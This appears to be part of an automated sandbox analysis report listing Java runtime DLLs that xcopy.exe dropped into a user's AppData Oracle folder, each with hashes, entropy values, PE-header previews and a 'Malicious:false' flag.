                                                                                                                                                                                              Preview: ....(........................O.....PV[.....$.....]...........Z.....`..a.......... .."........L....................Java HotSpot(TM) Client VM (25.211-b12) for windows-x86 JRE (1.8.0_211-b12), built on Apr 1 2019 20:53:53 by "java_re" with MS VC++ 10.0 (VS2010)..............................................................................................................{.......@... .O.........C:\Program Files (x86)\Java\jre1.8.0_211\lib\resources.jar;C:\Program Files (x86)\Java\jre1.8.0_211\lib\rt.jar;C:\Program Files (x86)\Java\jre1.8.0_211\lib\sunrsasign.jar;C:\Program Files (x86)\Java\jre1.8.0_211\lib\jsse.jar;C:\Program Files (x86)\Java\jre1.8.0_211\lib\jce.jar;C:\Program Files (x86)\Java\jre1.8.0_211\lib\charsets.jar;C:\Program Files (x86)\Java\jre1.8.0_211\lib\jfr.jar;C:\Program Files (x86)\Java\jre1.8.0_211\classes.....C:\Program Files (x86)\Java\jre1.8.0_211\lib\sunrsasign.jar.....C:\Program Files (x86)\Java\jre1.8.0_211\classes.....C:\Program Files (x86)\Java\jre1.8.0_211\lib\
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\client\jvm.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):3893624
                                                                                                                                                                                              Entropy (8bit):6.832853157906678
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:98304:xGprqNAVtyznigGJrIk4cnKPcv/GozRaESft:ir2zigGJ/4bcv/GozRaEQ
                                                                                                                                                                                              MD5:7740EDA81AD8EE6E2720AFFA70F2A8F0
                                                                                                                                                                                              SHA1:BFFB23858B2461E8D92378D2A3AC69F34C2DE8B9
                                                                                                                                                                                              SHA-256:D3980CA9BE247AE6293EAAD29DBBAEC9752D23CC3814B0F55C50C8E9E7576B64
                                                                                                                                                                                              SHA-512:4791D7A8F765CD9C7C1C035016F95D3CA6EF2673A5460F67ED62F894F3BA1C51F7B6482EEF8CEA03112093AA14DC63A44A59009E5044F0165D0997C367FD4CB7
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................}B.....v.F......}@......}t......M..............}u.....}E......}D......}C.....Rich............PE..L.....\...........!.....Z,..........A,......p,..............................P=.....yh<...@...........................4.....,.4.......9.(............N;.x.....9..P...v,...............................2.@............p,.`............................text....Y,......Z,................. ..`.rdata..*....p,......^,.............@..@.data.........5..,...v5.............@....rsrc...(.....9.......7.............@..@.reloc.......9.......7.............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\concrt140.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):248616
                                                                                                                                                                                              Entropy (8bit):6.699964486884577
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:fFSqgBLDeJkGOZAuaXE1TIh1MuyJ9eaJXUHKbOxA12z/W3NrrQ:fFRgMUlIh1ceLwOfz3
                                                                                                                                                                                              MD5:CF1F7F3E7C30ED97113B667A414FD5D3
                                                                                                                                                                                              SHA1:BE9F8FD21EC35CDE4669B30BD241C1B74BD1475F
                                                                                                                                                                                              SHA-256:2423A2A62FE0369C610837E240D691DA727D95A9C1D5ADD512D0D0C32E328836
                                                                                                                                                                                              SHA-512:9C9FDDF00ABEE52DBB65F14B711E7496EDF0A9D8A2D59CA299F40A30C79FD9EDB010FA19DC632D3F0BB840A747D787A2616D18050DE6376C4334D59F4CD1C8B7
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4.0p..cp..cp..c...cr..cy.ucz..cp..c...c...bu..c...bw..c...b|..c...bf..c...bK..c...bq..c...cq..c...bq..cRichp..c................PE..L....}.Y.........."!.........t..............0............................................@A.............................K..,b..........................(?.......+...'..8............................'..@............`..(............................text...l........................... ..`.data........0...,..................@....idata.......`.......H..............@..@.rsrc................Z..............@..@.reloc...+.......,...`..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):143736
                                                                                                                                                                                              Entropy (8bit):7.3348881758771505
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3072:XI63LPXAZP49o9NQSd5Ficcj5ojGylYCE2Iu2jGLF5A9bE8LUeVChc6:Y63DQZPYoi7IGgYCE2L1F5A9bEGUeN6
                                                                                                                                                                                              MD5:A6CDAECA9BE26E422B8AA12B32BCE96D
                                                                                                                                                                                              SHA1:AE2339B5805C07E2CECDB7F1E927E2EF8A153528
                                                                                                                                                                                              SHA-256:F014256B30AE006D5D8C6D20AF23957EF3886427027A54F3E2B0269F9B370D7A
                                                                                                                                                                                              SHA-512:95FF04D89D90CF1A51729A739CBC0A34729C171038ECEC818CA02BFCC306D1D74F86639CC20B3F6C8AE4CC622F43950AF6326AA2231FCE189BEC39A2D3E90597
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k..K.c.K.c.K.c.Br..I.c.P...H.c.P...I.c.P...N.c.K.b.m.c.P...m.c.P...J.c.P...J.c.P...J.c.RichK.c.........................PE..L.....\...........!.........Z......V........................................@.......=....@.................................<...P.... ..................x....0..........................................@............................................text...n........................... ..`.rdata........... ..................@..@.data....+.......(..................@....rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):65912
                                                                                                                                                                                              Entropy (8bit):6.357102728130537
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:x2yd2l7Pfj2I5HZ70dLhVP6gd2qPoyvVfoNVXfjMGaJng2WcZw0TYqwMfFSmj+Wx:xhd2xyI5HidLvmXNZ8B/ZlZF4W3h3j
                                                                                                                                                                                              MD5:57B272565D5F75696DF13DCE316259E1
                                                                                                                                                                                              SHA1:E69EE183500F57D8397283401F00F75F637B974E
                                                                                                                                                                                              SHA-256:B974E0EE2C36339348D3D1BB247C0F87345B8DE26558C79D823E6438DBB7E8AA
                                                                                                                                                                                              SHA-512:3D2621499798C2638B9E5C0AF201170022C6B6E7125109ACED65FC56A6529981730F9207E6324103FDCE017081B5DC59E327D8E4B75158114A62FCBA65D5775E
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................i.....O......................O.......O.......O.......v.......v.......v.......v.......Rich............................PE..L......\...........!.........$............................................... ............@.....................................d.......................x.......$...P...............................p...@...............t............................text.............................. ..`.rdata..B...........................@..@.data...............................@....rsrc...............................@..@.reloc..$...........................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):450424
                                                                                                                                                                                              Entropy (8bit):6.4842742283868215
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:08nJJb3ytYn404Y+nTMCRf6Unf0Uvm0a/GCMOBpPMZhvxIW1G2s4:08nJFdn40lCRN3vm0bhvq+5l
                                                                                                                                                                                              MD5:9EA3A4F24D6292358E7E43DA26E1628F
                                                                                                                                                                                              SHA1:E5013F669FBC01A71DFA6749890296E680549E33
                                                                                                                                                                                              SHA-256:B215F07FBCEE8F5377FFEA827031578DB6039D85FABD24364F6A7E2C08061BCA
                                                                                                                                                                                              SHA-512:3065C8AA9FA0DCC76D10F021540BF8190E1D3AAD6EB0A2409CDF81CF963FCDCB86C01C3A72786DB53E96E5B482C213373CF822BE2A7D9C0B1735A34355C3AEE5
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}.l_..?_..?_..?D.1?]..?.R5?\..?D.3?Y..?D..?L..?0j.?W..?Vd.?Y..?Vd>?J..?_..?...?D..?p..?D.6?^..?D.7?^..?D.0?^..?Rich_..?........................PE..L...r.\...........!.........<......~|....................................................@.............................y6..............................x........7...................................a..@...............H...........................text............................... ..`.rdata..9@.......B..................@..@.data...............................@....rsrc...............................@..@.reloc...D.......F...~..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):25976
                                                                                                                                                                                              Entropy (8bit):6.62242768383478
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:lQgxsj7ttB+su6+XJ6ZEPG5AvLysj+U8JN77hhr0:CYsftt3yJ6W+qysj+X3hN0
                                                                                                                                                                                              MD5:E5AD94B64C56549004C5693205C771C3
                                                                                                                                                                                              SHA1:A48FDA83C913E6D4A07C77528B2AFF2A19378ED1
                                                                                                                                                                                              SHA-256:0DB40E78C297C2ADC8A1F6CC4ECDA5394A7475C4480CF9D9167AD5864121C966
                                                                                                                                                                                              SHA-512:BADF714F141CD67E09F338A3AE59513B299E88E2D8F45B6203BDE7CAD859D39171F3017F85823B1F08084B4C8C25176185BF9882D71843E4132EF50F465DE126
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%..cK.cK.cK....cK....cK.cJ.cK....cK....cK....cK....cK....cK....cK.Rich.cK.........PE..L.....\...........!.....*...........4.......@...........................................@.........................pM......\H..<....p...............J..x............A...............................G..@............@...............................text....).......*.................. ..`.rdata.......@......................@..@.data........`.......@..............@....rsrc........p.......B..............@..@.reloc..~............F..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):22392
                                                                                                                                                                                              Entropy (8bit):6.5739275729345215
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:pwdi4i9u1aIVW98YyeWNrpPVowEj+5h8JN77hheTb:edi3lk28YyeorpdowEj+5O3hQTb
                                                                                                                                                                                              MD5:0D7372D29D1C55EC40CB607407B3656F
                                                                                                                                                                                              SHA1:932C5AEA84FF316755612C59697375F4B606048C
                                                                                                                                                                                              SHA-256:166BD1A5BED22865AAC6553F6310A3B041A7EB07C6E1EE6E5B57978111D3F12F
                                                                                                                                                                                              SHA-512:7E0635E5514F7D8C29575A9B5A256E5CF1F9DF5D9284A0D80E828DF867F77EDE4DB0F61E1A143638BCACD734662276BB5AE45DFF186BDEAF1FC9D382B44BFAF3
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..<...<...<...'<8.>...'<:.>...'<..>...<...v...5.7.9...'<..1...'<?.=...'<>.=...'<9.=...Rich<...........................PE..L.....\...........!.................&.......0......................................G.....@..........................A..U....<..P....`...............<..x....p......@1..............................x;..@............0..(............................text............................... ..`.rdata.......0....... ..............@..@.data........P.......2..............@....rsrc........`.......4..............@..@.reloc.......p.......8..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):828792
                                                                                                                                                                                              Entropy (8bit):6.011886939858762
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12288:qwDvfi2WLzqRaOm3fyNrsYzQEGK+3zV6WvChbOso6C6QJ1eeVRQ:d7fi2WLzm7m3fyNIYzQEI3zG
                                                                                                                                                                                              MD5:D409990C4F01CE760648062912F77FF4
                                                                                                                                                                                              SHA1:EA3D13210612BC5F4F42DB4051761171108E1015
                                                                                                                                                                                              SHA-256:AD8CB9361A6DE607B30FD50179E8A684CE33A3D34FA254525FCEBC1AA18EF523
                                                                                                                                                                                              SHA-512:262767DC714BBDB5B34C7D744EC61A6895A7476A6EB9DC19E70629743B0CBCC5AAFFC7F5AEF074660BED2F60DD44E8745A0541D88D4ACA10633AB9EFDE3D9740
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Ll..Ll..Ll..W.4.Wl..E.).El..E.9.Ul..Ll...m..#...Dl..W...l..W...$l..W.1.Ml..W.0.Ml..W.7.Ml..RichLl..........................PE..L...9.\...........!................h................................................O....@.................................t........P..................x....`...].....................................@...............p...........................text............................... ..`.rdata..h#.......$..................@..@.data....s.......R..................@....rsrc........P......................@..@.reloc..dq...`...r..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):908152
                                                                                                                                                                                              Entropy (8bit):6.157185879144199
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12288:LFJW4QO9/dp0+4jFRxIlSf5W5serPeUnvilkb6M1gIWvChbOso6C6QJueeWXXcsr:hJW4Qudp0+wFs45W5sanv7j1f6X28
                                                                                                                                                                                              MD5:0B4E6A3821A6F13128B6622A6E54071C
                                                                                                                                                                                              SHA1:938A60B7CB50320D8C4645DCA5B2F5253F8DE0ED
                                                                                                                                                                                              SHA-256:4910113DBE7507A26D93952B5F99EF7E77C4A30CB9B90F2D6FCA62B8E9190546
                                                                                                                                                                                              SHA-512:C8A2D2CE328B053F10DB20269A7311E4E14C53B7AE2BD4412058367EF9CA880CB6557407D41BED822744126B6C9B621AFB73DEBEFFDA071C5A04D37372C0C3EA
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................g>....g..L...#....3..................g......g;....g:....g=....Rich............................PE..L.....\...........!.................=....... .......................................O....@..........................:..................X...............x........b...%..............................P...@............ ..P...\........................text............................... ..`.rdata..4.... ......................@..@.data...$W...@...4..................@....rsrc...X............b..............@..@.reloc..<f.......h...X..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\eula.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):109944
                                                                                                                                                                                              Entropy (8bit):5.91774227064997
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:niEPbKJlXgZoGs34aljI8qXztsFaiEpOBbsO4lunk53hXl:iAbSgZW33lVqj+EiEpOBIO4lr3l
                                                                                                                                                                                              MD5:F4FC8F04E9431C03507AAA6628445404
                                                                                                                                                                                              SHA1:73426FE18B7CD5687B3F7999CD4D76867538F0AB
                                                                                                                                                                                              SHA-256:428F3B85C6FC07E0E70287B4100AE12F1F3FC397E63A64F363E26239A5DD382D
                                                                                                                                                                                              SHA-512:CD2652D31FCF505582EA1E11C9246706230B676C6B7F76B75A262835D63918AA0DFD943BCB4205F1E091CDC57A8F385250FB130F45222249B2B0611E31DDB47E
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ot....Z...Z...Z..Z...ZC@.Z...Z..Z...Z..Z...Z.v.Z...Z.v.Z...Z...Z...Z.x.Z...Z..Z...Z..Z...Z..Z...Z..Z...ZRich...Z........................PE..L.....\...........!.................................................................@....@.........................P...J............0...t..............x...........P...............................0...@............... ...d...`....................text............................... ..`.rdata...D.......F..................@..@.data...0...........................@....rsrc....t...0...v..................@..@.reloc...............|..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):227192
                                                                                                                                                                                              Entropy (8bit):6.470482613611216
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:LsNKsu7tpbB4+UXtpqbr5FSh+8STFGMReiD72t6OBhhA:YNKsu7tpbB4+Wtpqbr5FSh+X5GSoY
                                                                                                                                                                                              MD5:14DD2A294E9415A617177D628C80F787
                                                                                                                                                                                              SHA1:5C848C6FC59E0418A9325AF48F54B24E0810A636
                                                                                                                                                                                              SHA-256:3AAC1ED7F377A471002A830EBC35933BDC5B2E3EB149C249F44D614E78D71B89
                                                                                                                                                                                              SHA-512:A7BC09E08E26FE418DCA229017270501F36C1EB488FCF00AC86284FD5D6F41C020C64B6408F1605C74D80E236B05B4062B4A1CBE2F50E5E7CBA36D42B5055B1E
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......wG.s3&. 3&. 3&. .h. 0&. (.. 6&. :^. ;&. (.. 4&. 3&. n&. (.4 n&. (.5 "&. (.. 2&. (.. 2&. (.. 2&. Rich3&. ........PE..L.....\...........!.........~............................................................@......................... K.......A.......p...............\..x...........................................@/..@............................................text...J........................... ..`.rdata...O.......P..................@..@.data........P.......8..............@....rsrc........p.......D..............@..@.reloc..L............H..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):154488
                                                                                                                                                                                              Entropy (8bit):6.504807977722444
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3072:6k0xjiMw46pRBakBDGSKdvngxDbZ7MRfGr5HGDW3auxbx:qjiM6mmiSKdsN7KfKIW3Fx
                                                                                                                                                                                              MD5:198378FD6F624BF34194BB24E29D5F04
                                                                                                                                                                                              SHA1:5178D0C769778E766CF7C56264C3AA12FE3260B1
                                                                                                                                                                                              SHA-256:390E62F1CDD8DFA47565547C9F7805D10890C86588E5285216C9E5D18539A374
                                                                                                                                                                                              SHA-512:165D2C0F4F9433A9E29D022630F82C471A54CEB9D994A2C34867F5B5DCC827920ED4D6A88FA73E66763422CFC52D11C3370FA1CC5773DB4C858E271276B4025B
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.,,...,...,...%j\. ....v.~.....v.~*....v.~9....v.~ ..._p.~(..._p.~&....v.~)...,...3....v.~ ....v.~.....v.~-....v0.-....v.~-...Rich,...........PE..L......\...........!........................................................p......C8....@......................... ...P...p........@...............@..x....P......................................0...@...............l............................text............................... ..`.rdata...l.......n..................@..@.data...4....0......................@....rsrc........@.......$..............@..@.reloc.......P.......(..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\glass.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):216440
                                                                                                                                                                                              Entropy (8bit):6.427045773449867
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:HlG7qMlz6ojZw2Q6Eb17zosGSLW47BsA+h4:FG71z6ojZwz7z/HL986
                                                                                                                                                                                              MD5:3E8D0880879A1E36C0D5DA515C8139E3
                                                                                                                                                                                              SHA1:3627BEC3FC1DDC1D21470173018936687ED509E5
                                                                                                                                                                                              SHA-256:5D0C5FDF0C716E8964AFFC563F6C7198EC46F51486F4A9346CB592A5DEEC1DD4
                                                                                                                                                                                              SHA-512:6C6A360A3ECDC5B5BCA6F16781DD173BAFED7EE503482EF45C8FE38E05BC56AE1D3BBF6811302387586817564E24E37B3D73E851AD47A6201E8C48152C909423
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I<k{.].(.].(.].(.%.(.].(.9.).].(.9.).].(.9.).].(~?.).].(~?.).].(.].(.\.(.9.).].(.9.).].(.9.).].(.9.(.].(.9.).].(Rich.].(........PE..L......\...........!.........2............... ...............................p............@....................................@.......X&...........2..x....@...+...R......................,R......pQ..@............ ......4........................text...,........................... ..`.rdata...... ......................@..@.data...P)......."..................@....rsrc...X&.......(..................@..@.reloc...+...@...,..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):600952
                                                                                                                                                                                              Entropy (8bit):6.18356989077687
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12288:lhEIYZl475HefXezhFTpB9un/veVnHdyPII3EiV+eaVT:TmZl8HefXezhFTdzdHdIILs+eaVT
                                                                                                                                                                                              MD5:0E4C62678621938644198E73A3A6203A
                                                                                                                                                                                              SHA1:A56FF96755C47F068B55771290528A9249D73DC2
                                                                                                                                                                                              SHA-256:F7113CC124BC55839238E2110534CC7A8D3373E4919E1D4EDE4E76C8CA24F03F
                                                                                                                                                                                              SHA-512:7FAF4D6E4586D55163D2B07F67629374783CE9B9E74551B489F1689480A36B7A6B99329929D861A8B04C0D494E1D3B62476685EC0D68620636DF38506582CCE8
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Yf.8...8...8...@...8..c\...8../...8..c\...8..c\...8..c\...8..Z\...8..Z\...8...Z...8...8...9..Z\...8..Z\...8..Z\...8..Rich.8..................PE..L...a..\...........!.........(...............................................`............@.....................................|.... ..................x....0.. *..................................0...@...............d............................text...{........................... ..`.rdata..............................@..@.data....!..........................@....rsrc........ ......................@..@.reloc.. *...0...,..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):743288
                                                                                                                                                                                              Entropy (8bit):6.723795053093137
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12288:Q57+rmVuj0ks5YDlLsi/UtY8Rtw8FhGSeENli2knXSUEknwLQEsfvc6D5RlWGyci:K+rT0krlQiG3tvhbeMkXS+w0RQ
                                                                                                                                                                                              MD5:D55C8440D84ACF28878F18C3CE1B2597
                                                                                                                                                                                              SHA1:3B21E119A7956482284A9C4C112A7F27E8343689
                                                                                                                                                                                              SHA-256:210C28AAB1592B8213A2B2909640602E26C3D65A42B333B6BF33ED5016AB1F56
                                                                                                                                                                                              SHA-512:C3B5FA5FB40856CA891122DADD9A3F4B0C3DA7962354678C8D844D1734E5372476B44274E7EEB01C44EFB2AD589CD7B429F25E2624A8071F63FC0303951A5F15
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.?'..Qt..Qt..Qt...t..Qt.Pu..Qt.a.t..Qt.Ru..Qt.Tu..Qt.Uu..Qt..Uu..Qto.Pu..Qt..Pu..Qt..Pt0.Qt..Qu..Qt...t..Qt..Su..QtRich..Qt........PE..L...{..\...........!.....:..................P......................................;C....@..........................................................<..x.... ...b..................................0...@............P...............................text....8.......:.................. ..`.rdata..Jw...P...x...>..............@..@.data...D1..........................@....rsrc...............................@..@.reloc...b... ...d..................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):133496
                                                                                                                                                                                              Entropy (8bit):6.673761407092987
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3072:b0V2kbLSSaDdr8814VRGx+wEG4lgb371xiEvtmqdrkCB/jKChyNCY0:ibL9q4M11jKe+J0
                                                                                                                                                                                              MD5:560352A60930E13DCF009FDC21D285E9
                                                                                                                                                                                              SHA1:E3BEE840439183174FF4515817ED2D0C3298B9B4
                                                                                                                                                                                              SHA-256:C74610342A1DF8ED01DBFD9638E24B72B1942973C2EB844C7E0B92863AEAFAFC
                                                                                                                                                                                              SHA-512:2CDB4B03A6A7AE5F83A9C86491949E7D180309CE6215921D37C5C229BF26EF200BA14B41A7ADF115563532825A7882B9D99D7580F482597DB30BC9CEE39A85BA
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........vu^............8Y...............................o..............................................Rich............................PE..L.....\...........!.....z...x......_........................................ ............@.............................i...|...d.......................x........................................... ...@...............d............................text...Ny.......z.................. ..`.rdata...N.......P...~..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\instrument.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):117112
                                                                                                                                                                                              Entropy (8bit):6.75718536073561
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3072:Oeq+/VOu1/k6n63ycdxMULqMe1UfTBfrUkgnEKb:OeqaFk663yUOULq71UfTBQ3b
                                                                                                                                                                                              MD5:3803A4CA553543BA62A27429FFD01BB1
                                                                                                                                                                                              SHA1:3C1D3D8F10BA54F8A7C0345ADBEF28E99FCABABD
                                                                                                                                                                                              SHA-256:64EE3AE58581F3D0DDAB52E84293AF24DB52CEE6C27634697CE47C9D029B72B6
                                                                                                                                                                                              SHA-512:1C4C95A49200F481E2E58DB547282C453DFEDEDEDCE4775D8A207F52DCA671B661F06A7A7AB2F854C514D3232DA20A6033FA46D74CA9C5CE676B9174DD3E178C
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........g0...c...c...c..c...c...c...cP..c...c.|.c...c.|.c...c.|.c...c.|.c...c.|.c...c.|.c...cRich...c........PE..L.....\...........!................8........0.......................................]....@.........................`...........(.......................x...........p1..............................H...@............0..0............................text............................... ..`.rdata...f...0...h... ..............@..@.data....,..........................@....rsrc...............................@..@.reloc..b...........................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):17272
                                                                                                                                                                                              Entropy (8bit):6.505530589091723
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:DIoJkyh9wlSZnDonPV5CyEbbXj+fI8JN77hh1f:DBJkWWoJkndKbTj+fr3hLf
